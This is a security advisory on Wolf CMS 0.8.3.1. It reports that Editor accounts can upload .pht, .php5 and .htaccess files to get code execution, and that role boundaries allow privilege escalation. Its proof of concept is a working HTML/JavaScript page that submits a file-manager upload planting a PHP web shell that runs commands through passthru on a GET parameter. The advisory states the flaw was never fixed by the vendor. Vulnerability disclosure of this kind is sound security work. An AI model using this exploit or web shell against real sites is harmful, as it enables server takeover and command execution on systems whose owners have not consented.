Wolf CMS v0.8.3.1: Code Execution & Privilege Escalation

Date: 2016-01-28 09:48:23

1. Introduction

2. Overview

CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Wolf CMS is a content management system written in PHP. In version 0.8.3.1, it is vulnerable to code execution. Additionally, the distiction between the user roles Editor, Developer, and Admin is weak, as it is possible for a user to escalate their privilege.

An Editor account is required to exploit this issue.

3. Details: Code Execution

Editors cannot upload php or php4 files. They can however upload pht or php5 files, which will be executed by most default apache configurations. Additionally, they can upload .htaccess files, which - if the server parses them - allow PHP code execution with arbitrary files, such as image files.

Proof of Concept:

<html> <body> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http://localhost/wolfcms/?/admin/plugin/file_manager/upload", true); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------45938481419296872941792416751"); xhr.withCredentials = true; var body = "-----------------------------45938481419296872941792416751\r\n" + "Content-Disposition: form-data; name=\"csrf_token\"\r\n" + "\r\n" + "961550c7140afaa6f10acc2be52f91146a1738b3809a55530ee7199d7a777162\r\n" + "-----------------------------45938481419296872941792416751\r\n" + "Content-Disposition: form-data; name=\"upload[path]\"\r\n" + "\r\n" + "/\r\n" + "-----------------------------45938481419296872941792416751\r\n" + "Content-Disposition: form-data; name=\"upload_file\"; filename=\"test.pht\"\r\n" + "Content-Type: application/octet-stream\r\n" + "\r\n" + "\x3c?php \n" + "passthru($_GET[\'x\']);\n" + "\r\n" + "-----------------------------45938481419296872941792416751\r\n" + "Content-Disposition: form-data; name=\"commit\"\r\n" + "\r\n" + "Upload\r\n" + "-----------------------------45938481419296872941792416751--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form> </body> </html>

3. Details: Privilege Escalation

The distinction between the user roles Admin and Developer is meaningless, as both can gain code execution via the snippet and layout editor here:

http://localhost/wolfcms/?/admin/snippet/edit/2 http://localhost/wolfcms/?/admin/layout/edit/3

The distinction between the Editor and Admin role is also weak, as editors are allowed to post JavaScript code, which allows them to escalate their privileges.

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline